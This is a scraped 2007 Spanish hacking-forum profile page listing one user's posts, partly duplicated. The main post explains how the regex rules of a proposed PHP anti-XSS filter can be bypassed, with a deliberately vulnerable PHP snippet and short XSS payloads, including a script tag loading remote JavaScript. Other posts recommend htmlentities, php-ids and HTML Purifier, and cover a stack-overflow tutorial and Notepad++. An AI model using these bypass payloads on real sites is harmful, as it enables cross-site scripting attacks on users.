son problemas en el servidor, esperen un momento xD, el-brujo esta jugando con la computadora o algo asi, y esta OFF, debería regresar en unos momentos..
Saludos!!
Saludos!!
- Bienvenido a Test Foro de elhacker.net SMF 2.1.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#1342
Hacking / Re: Código PHP AntiXSS
30 Julio 2007, 23:02 PM
born2kill:
supongo que es para prevenir attribute splitting, como en:
se puede saltar simplemente no cerrando el atributo
?a=" onmouseover="alert(/xss/.source)"
se salta, igual no cerrando <script.. asi:
no pones el ; al final..
la coma la puedes no usar llamando funciones desde funcion.apply, los ; puedes no usarlos, los "<" y ">" si los quitas, entonces para que son las primeras 2 reglas? XD, y las comillas, para ataques de XSS no son necesarias, puedes usar /texto/.source
Saludos!!
Código [Seleccionar]
(\"|%22).*(\>|%3E|<|%3C).*supongo que es para prevenir attribute splitting, como en:
Código (php) [Seleccionar]
<?php
echo "<a href=\"{$_GET['entrada']}\">Link</a>";
?>
se puede saltar simplemente no cerrando el atributo
?a=" onmouseover="alert(/xss/.source)"
Código [Seleccionar]
(\<|%3C).*script.*(\>|%3E) se salta, igual no cerrando <script.. asi:
Código [Seleccionar]
<script src=//sirdarckcat.net/cache_poisoning.js xCódigo [Seleccionar]
(javascript:).*(\;).*no pones el ; al final..
Código (javascript) [Seleccionar]
javascript:alert("pwned")Código [Seleccionar]
(,|;|<|>|'|`)la coma la puedes no usar llamando funciones desde funcion.apply, los ; puedes no usarlos, los "<" y ">" si los quitas, entonces para que son las primeras 2 reglas? XD, y las comillas, para ataques de XSS no son necesarias, puedes usar /texto/.source
Saludos!!
#1343
Hacking / Re: Código PHP AntiXSS
30 Julio 2007, 04:13 AM
htmlentities es LA funcion de XSS jaja, pero no siempre es muy buena, porque rompe cosas que aveces no deben romperse.. (por ejemplo si vas a hacer algo mas con ese input, debes descodificarlo antes de usarse).. por eso, la mejor opción orientada a casos particulares, es hacer tu propia expresión regular, siembargo, si no tienes idea de como parchear, y solo quieres estar seguro que no te van a atacar con XSS, usa htmlentities, el doctor lo recomienda xD
#1344
Tutoriales - Documentación / Re: XSS FINAL-Version TXT
30 Julio 2007, 02:55 AM
19.5
dame un ejemplo
si codificas < por < por ejemplo, al momento de imprimirse, igual se imprimirá <, no <..
igual con urlencode(), etc.. cualquier codificación que no sea decodificada antes del echo, será enviada codificada de la misma forma..
Saludos!!
dame un ejemplo
si codificas < por < por ejemplo, al momento de imprimirse, igual se imprimirá <, no <..
igual con urlencode(), etc.. cualquier codificación que no sea decodificada antes del echo, será enviada codificada de la misma forma..
Saludos!!
#1345
Hacking / Re: Código PHP AntiXSS
30 Julio 2007, 02:45 AM
si, ademas es un poco lento..
Una buena opción para DETECTAR ataques de XSS, sería php-ids (php-ids.org)..
Una para permitir HTML, sin tener peligro de XSS, pueden usar html-purifier (htmlpurifier.org)..
Aun asi, para algo rapido, puedes hacer una expresion regular como bien dice crack_x
Saludos!!
Una buena opción para DETECTAR ataques de XSS, sería php-ids (php-ids.org)..
Una para permitir HTML, sin tener peligro de XSS, pueden usar html-purifier (htmlpurifier.org)..
Aun asi, para algo rapido, puedes hacer una expresion regular como bien dice crack_x
Saludos!!
#1347
Bugs y Exploits / Re: <-> Taller de Stack Overflows en Windows, por Rojodos
27 Julio 2007, 09:18 AM
Tu error debe estar en la direccion del salto a JMP ESP.. pero.. porque pones el salto a JMP ESP al final del shellcode? :-/ lee otraves el tutorial de rojodos jeje
Saludos!!
CitarPor otro lado, cuando compilo el shell y lo ejecuto se me abre correctamente la shell pero no sesi lo pudiste ejecutar, es porque ya se genero un exe.
me genera el exe.
Saludos!!
#1348
Scripting / Re: Batch editor 1.1.[DESCARGA]
27 Julio 2007, 05:32 AM
berz3k:
http://notepad-plus.sourceforge.net/
invisible_hack:
un batcheditor en batch? debe ser bastante incomodo, algo similar a [copy con:] supongo.. ademas sería dificil que implementes colores, (no digo que no sea posible, solo que será bastante complicado..), en fin, sería interesante ver que tal..
Saludos!!
http://notepad-plus.sourceforge.net/
Citar
Sintaxis coloreada y envoltura de sintaxis
Lenguajes soportados :
C C++ Java C# XML HTML
PHP CSS makefile ASCII art (.nfo) doxygen ini file
batch file javascript ASP VB/VBS SQL Objective-C
RC resource file Pascal Perl Python Lua TeX
TCL Assembler Ruby Lisp Scheme Properties
Diff Smalltalk Postscript VHDL Ada Caml
AutoIt KiXtart Matlab Verilog Haskell InnoSetup
CMake
WYSIWYG
Si tiene una impresora a color, podrá imprimir su código fuente (o lo que usted quiera) en color.
Sintaxis coloreada a elección del usuario
Permite al usuario definir su propio lenguaje : no sólo las palabras clave para la sintaxis coloreada, sino también las palabras clave para la envoltura de sintaxis, los comentarios clave y los operadores.
Autocompletado
Para la mayoría de los lenguajes soportados, el usuario puede hacer su propia lista de API (o descargar los archivos de API desde la sección de descarga). Una vez instalado el archivo de API, teclee Ctrl+espacio para ejecutar esta acción (ver captura). Para más informacion acerca del autocompletado, ver Uso del Autocompletado.
Multi-Documento
Puede editar varios documentos al mismo tiempo.
Multi-Vista
Puede usar dos vistas al mismo tiempo. Esto significa que puede visualizar (editar) dos documentos diferentes a la vez (captura). También puede visualizar y editar un mismo documento en vistas y posiciones diferentes. La modificación del documento en una vista quedará reflejada también en la otra (es decir usted modifica el MISMO documento a pesar de que en realidad está viendo una copia, vea la siguiente captura).
Soporte para Buscar/Reemplazar expresiones regulares
Puede buscar y reemplazar una cadena usando expresiones regulares.
Soporte completo para Arrastrar y colocar
Puede abrir documentos arrastrándolo y soltándolo en la aplicación. Además también podrá mover su documento desde una posición (o vista) a otra arrastrando y soltando.
Posición dinámica de las vistas
El usuario puede fijar la posición de los documentos dinámicamente (solamente hay dos opciones: organizar las ventanas en horizontal o en vertical);
Deteción automática del estado del documento
Si modifica o elimina un archivo que está actualmente abierto en Notepad++, el programa le avisará de tal situación y le preguntará que desea hacer con el mismo (actualizarlo o eliminarlo).
Herramienta de Zoom
Esta es otra fantástica función del componente Scintilla.
Funcionamiento bajo entornos multilingües
Puede instalar el programa bajo una edición de la plataforma Windows en chino, japonés coreano, árabe y hebreo. Vea la captura de Notepad++ en acción bajo Windows en distintas lenguas: chino, árabe y hebreo.
Puntos de marca
Tan sólo con hacer clic en el margen de marcas (situado justo a la derecha del margen de número de línea) o pulsar Ctrl+F2 puede establecer o borrar un punto de marca de libro. Para ir a un punto de marca, pulse F2 (Siguiente marcador) o Shift+F2 (Anterior marcador). Para borrar todos los marcadores, ir al menú Buscar->Borrar todos los puntos de marca.
Resaltado de paréntesis y sangría
Cuando el cursor se encuentre justo al lado de uno de estos símbolos { } [ ] ( ), dicho carácter (símbolo de apertura) y su opuesto (símbolo de cierre) serán resaltados, junto con la línea de sangría (si la hubiera) con el fin de localizar los bloques de código más fácilmente.
Grabación y reproducción de macros
Puede guardar varias macros y editar sus atajos de teclado.
invisible_hack:
un batcheditor en batch? debe ser bastante incomodo, algo similar a [copy con:] supongo.. ademas sería dificil que implementes colores, (no digo que no sea posible, solo que será bastante complicado..), en fin, sería interesante ver que tal..
Saludos!!
#1349
Sugerencias y dudas sobre el Foro / Re: Sugerencia: Warzone para novatos
27 Julio 2007, 02:58 AM
Lo de encontrar una con un scanner definitivamente no se hará.. (algo asi entendí que se sugirió en algun momento aqui) no promoveré el uso de scanners, es una practica mala, poco confiable, y no util, da mas del 50% de falsos positivos, y muchas veces no encuentran nada, donde si hay, los fuzzers en su mayoría "funcionan", pero no son lo suficientemente.. confiables.. en pocas palabras, no, no, no xD, ademas gastan mucho bandwidth y dejan los logs muy pesados.. (aunque aun asi escanean a warzone, deberian de ver el log xD buscando bugs de JSP en una web en PHP ¬¬ que cosas..), la mayoria encontraran honeypots, pero en fin..
Lo de decir que bug debes encontrar tampoco se puede hacer, pordios xD cuando vas a atacar a alguien, no le preguntas su punto debil.. ¬¬
Lo que si se me hace una buena idea, y que fue sugerido hasta arriba, es lo de hacer una serie de pruebas documentadas.. eso es buena idea
, cuando tenga tiempo lo organizo..
Saludos!!
Lo de decir que bug debes encontrar tampoco se puede hacer, pordios xD cuando vas a atacar a alguien, no le preguntas su punto debil.. ¬¬
Lo que si se me hace una buena idea, y que fue sugerido hasta arriba, es lo de hacer una serie de pruebas documentadas.. eso es buena idea
, cuando tenga tiempo lo organizo..Saludos!!
#1350
WarZone / Re: Para los Guerreros de: WarZone !
27 Julio 2007, 02:10 AM
Estuvo OFF 1 hora porque se fue la luz
Saludos!!
Saludos!!